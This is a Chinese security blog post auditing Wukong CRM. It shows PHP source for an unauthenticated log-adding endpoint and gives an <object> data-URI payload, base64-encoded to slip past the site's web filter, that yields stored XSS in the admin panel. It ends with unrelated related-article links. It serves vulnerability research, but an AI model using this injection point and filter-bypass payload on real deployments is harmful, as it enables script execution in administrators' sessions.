无需登录-悟空CRM 存储型XSS

审计悟空的缘由是看见某云爆出CRM的getshell,于是就想着去挖出来瞅瞅!但可能自己把自己给局限了,就想着去挖那些无限制访问的文件。

故事的发生点
漏洞文件:/App/Lib/Action/LogAction.class.php
public function wxadd(){
        if($_POST['subject']){
            $log = M('Log');
            $log->create();
            $log->create_date = time();
            $log->update_date = time();
            
            $log->role_id = $_GET['id'];
            if($log->add()){
                $this->success(L('ADD SUCCESS', array(L('LOG'))));
            }else{
                $this->error(L('ADD_LOG_FAILED'));
            }
        }else{
            $this->display();
        }
    }
判断是否为post请求,如果条件为真则进入添加(这里要说一下,网站是开启了GPC的,但是存储入数据库时是进行了还原的)
public function index(){
        $m_log = M('Log');
        $m_comment = M('Comment');
        $where = array();
        $params = array();
        
        $order = "create_date desc";
        if($_GET['desc_order']){
            $order = trim($_GET['desc_order']).' desc';
        }elseif($_GET['asc_order']){
            $order = trim($_GET['asc_order']).' asc';
        }
        
        $below_ids = getSubRoleId(false);
        $all_ids = getSubRoleId();
        $module = isset($_GET['module']) ? trim($_GET['module']) : '';
        $by = isset($_GET['by']) ? trim($_GET['by']) : '';
        switch ($by) {
            case 'today' : $where['create_date'] =  array('gt',strtotime(date('Y-m-d', time()))); break;
            case 'week' : $where['create_date'] =  array('gt',(strtotime(date('Y-m-d', time())) - (date('N', time()) - 1) * 86400)); break;
            case 'month' : $where['create_date'] = array('gt',strtotime(date('Y-m-01', time()))); break;
            case 'add' : $order = 'create_date desc';  break;
            case 'update' : $order = 'update_date desc';  break;
            case 'sub' : $where['role_id'] = array('in',implode(',', $below_ids)); break;
            case 'me' : $where['role_id'] = session('role_id'); break;
            default :  $where['role_id'] = array('in',implode(',', $all_ids)); break;
        }
    
        if ($_GET['r'] && $_GET['module']){
            $m_r = M($_GET['r']);
            $log_ids = $m_r->getField('log_id', true);
            $where['log_id'] = array('in', implode(',', $log_ids));
        }

        if (!isset($where['role_id'])) {
            $where['role_id'] = array('in',implode(',', getSubRoleId()));
        }
        if(intval($_GET['type'])){
            $where['category_id'] = intval($_GET['type']);
        }else{
            $where['category_id'] = array('neq',1);
        }
        if ($_REQUEST["field"]) {
            $field = trim($_REQUEST['field']);
            $search = empty($_REQUEST['search']) ? '' : trim($_REQUEST['search']);
            $condition = empty($_REQUEST['condition']) ? 'eq' : trim($_REQUEST['condition']);
            if  ('create_date' == $field || 'update_date' == $field) {
                $search = strtotime($search);
            } elseif ('role_id' == $field) {
                $condtion = "is";
            }
            $params = array('field='.$_REQUEST['field'], 'condition='.$condition, 'search='.trim($_REQUEST["search"]));
            $field = trim($_REQUEST['field']) == 'all' ? 'subject|content' : $_REQUEST['field'];
            switch ($_REQUEST['condition']) {
                case "is" : $where[$field] = array('eq',$search);break;
                case "isnot" :  $where[$field] = array('neq',$search);break;
                case "contains" :  $where[$field] = array('like','%'.$search.'%');break;
                case "not_contain" :  $where[$field] = array('notlike','%'.$search.'%');break;
                case "start_with" :  $where[$field] = array('like',$search.'%');break;
                case "end_with" :  $where[$field] = array('like','%'.$search);break;
                case "is_empty" :  $where[$field] = array('eq','');break;
                case "is_not_empty" :  $where[$field] = array('neq','');break;
                case "gt" :  $where[$field] = array('gt',$search);break;
                case "egt" :  $where[$field] = array('egt',$search);break;
                case "lt" :  $where[$field] = array('lt',$search);break;
                case "elt" :  $where[$field] = array('elt',$search);break;
                case "eq" : $where[$field] = array('eq',$search);break;
                case "neq" : $where[$field] = array('neq',$search);break;
                case "between" : $where[$field] = array('between',array($search-1,$search+86400));break;
                case "nbetween" : $where[$field] = array('not between',array($search,$search+86399));break;
                case "tgt" :  $where[$field] = array('gt',$search+86400);break;

上一页      

                default : $where[$field] = array('eq',$search);
            }
        }
        $p = isset($_GET['p']) ? intval($_GET['p']) : 1 ;
        $list = $m_log->where($where)->page($p.',10')->order($order)->select();
        $count = $m_log->where($where)->count();
        import("@.ORG.Page");
        $Page = new Page($count,10);
        if (!empty($_REQUEST['by'])){
            $params['by'] = 'by=' . trim($_REQUEST['by']);
            
        }
        if (!empty($_REQUEST['r']) && !empty($_REQUEST['module'])) {
            $params['r'] = 'r=' . trim($_REQUEST['r']);
            $params['module'] = 'module=' . trim($_REQUEST['module']);
        }
        if (!empty($_REQUEST['type'])) {
            $params['type'] = 'type=' . trim($_REQUEST['type']);
        }
        
        $this->parameter = implode('&', $params);
        if ($_GET['desc_order']) {
            $params[] = "desc_order=" . trim($_GET['desc_order']);
        } elseif($_GET['asc_order']){
            $params[] = "asc_order=" . trim($_GET['asc_order']);
        }
        
        $Page->parameter = implode('&', $params);
        $show = $Page->show();     
        $this->assign('page',$show);
        foreach($list as $key=>$value){
            $list[$key]['creator'] = getUserByRoleId($value['role_id']);
            if($m_comment->where("module='log' and module_id=%d", $value['log_id'])->select()){
                $list[$key]['is_comment'] = 1;
            }
        }
        
        $this->category_list = M('LogCategory')->order('order_id')->select();
        //获取下级和自己的岗位列表,搜索用
        $d_role_view = D('RoleView');
        $this->role_list = $d_role_view->where('role.role_id in (%s)', implode(',', $below_ids))->select();
        
        $this->assign('list',$list);
        $this->alert = parseAlert();
        $this->display();
    }
首先要说下此为需要登录后的权限才能访问的页面,然后则是查询咱们log表中的内容,以正序的方式查询。最后用assign直接输出到了当前模板中0.0  我这里就简单的说明了。函数内容太多!!!一个个的说挺费劲的。说的不对希望指出
验证漏洞:
这里还感谢90群里面的roisatm表哥提供了一种绕过悟空CRM的webscan方法

未登录下可访问的页面
填入咱们的测试XSS
object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSm9zZXBoIik7PC9zY3JpcHQ+=">
/object>

没有拦截,只有顺畅的感觉就是棒棒哒
现在登录去后台看下

上一页     

无需登录-悟空CRM 存储型XSS的更多相关文章

  1. 小白日记49:kali渗透测试之Web渗透-XSS(三)-存储型XSS、DOM型XSS、神器BEFF

    存储型XSS与DOM型XSS [XSS原理] 存储型XSS 1.可长期存储于服务器端 2.每次用户访问都会被执行js脚本,攻击者只需侦听指定端口 #攻击利用方法大体等于反射型xss利用 ##多出现在留 ...

  2. Java Web开发 - 持久型/存储型XSS漏洞

    Java Web开发 - 持久型/存储型XSS漏洞 1.什么是XSS漏洞攻击? XSS是跨站脚本攻击(Cross Site Scripting)的简称,之所以叫XSS而不是CSS相比大家都能明白了吧, ...

  3. 【代码审计】大米CMS_V5.5.3 后台多处存储型XSS漏洞分析

      0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www ...

  4. DVWA(七):XSS(stored)存储型XSS攻击

    存储型XSS : 存储XSS,会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在.提交JS攻击代码存储到数据库然后再输出. low: 观察源码: <?php if( isset( ...

  5. 74CMS 3.0 存储型XSS漏洞

    一. 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二.代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编 ...

  6. 利用mysql对特殊字符和超长字符会进行截断的特性 进行存储型XSS攻击——WordPress <4.1.2 & <=4.2 存储型xss

    转自:Baidu Security LabXteam http://xteam.baidu.com/?p=177 漏洞概述 本次漏洞出现两个使用不同方式截断来实现的存储型xss,一种为特殊字符截断,一 ...

  7. Coremail邮件系统存储型XSS两个

    (1):Coremail邮件系统存储型XSS之一 给受害者发送主题如下的邮件: <svg onload='img=new Image();img.src="//x55.me/geo.p ...

  8. DVWA 黑客攻防演练(十一) 存储型 XSS 攻击 Stored Cross Site Scripting

    上一篇文章会介绍了反射型 XSS 攻击.本文主要是通过 dvwa 介绍存储型 XSS 攻击.存储型 XSS 攻击影响范围极大.比如是微博.贴吧之类的,若有注入漏洞,再假如攻击者能用上一篇文章类似的代码 ...

  9. 【代码审计】QYKCMS_v4.3.2 前台存储型XSS跨站脚本漏洞分析

      0x00 环境准备 QYKCMS官网:http://www.qykcms.com/ 网站源码版本:QYKCMS_v4.3.2(企业站主题) 程序源码下载:http://bbs.qingyunke. ...

随机推荐

  1. 原生Ajax函数

    前言 在日常工作中,我经常使用Jquery的Ajax来获取接口数据.这几天有一个的官网要制作,由于网站比较小,有一些与服务器通信的接口处理,并没有涉及到复杂的交互功能.为了可以减少加载Jquery库的 ...

  2. ZOJ3435_Ideal Puzzle Bobble

    把L,H,W分别减一就变成上面一个题目了. 不多说,也不召唤代码君了.

  3. JAVA LOG4J使用方法

    首先,需要在项目中导入log4j使用的JAR包,导入结果如下图: 菜单:Build Path->Configure Build Path->Add Extern Jars 导入JAR包后, ...

  4. Educational Codeforces Round 56 Div. 2 翻车记

    A:签到. B:仅当只有一种字符时无法构成非回文串. #include<iostream> #include<cstdio> #include<cmath> #in ...

  5. 【BZOJ1499】【NOI2005】瑰丽华尔兹(动态规划)

    [BZOJ1499]瑰丽华尔兹(动态规划) 题面 BZOJ 题解 先写部分分 设\(f[t][i][j]\)表示当前在\(t\)时刻,位置在\(i,j\)时走的最多的步数 这样子每一步要么停要么走 时 ...

  6. 【bzoj4013】 HNOI2015—实验比较

    http://www.lydsy.com/JudgeOnline/problem.php?id=4013 (题目链接) 题意 给出$n$个数的$m$个大小关系,问它们之间可以形成的单调不降的序列有多少 ...

  7. 20165218 《网络对抗技术》Exp4 恶意代码分析

    Exp4 恶意代码分析 任务一:系统运行监控 记录分析联网的程序 创建计划任务netstat5218 schtasks /create /TN netstat5218 /sc MINUTE /MO 1 ...

  8. 单点登录(十一)-----遇到问题-----cas启用mongodb验证方式报错--Unable to locate Spring NamespaceHandler for XML schema na

    cas启用mongodb验证方式报错--Unable to locate Spring NamespaceHandler for XML schema namespace [http://www.sp ...

  9. 演化理解 Android 异步加载图片(转)

    演化理解 Android 异步加载图片(转)http://www.cnblogs.com/CJzhang/archive/2011/10/20/2218474.html

  10. E. Turn Off The TV Educational Codeforces Round 29

    http://codeforces.com/contest/863/problem/E 注意细节 #include <cstdio> #include <cstdlib> #i ...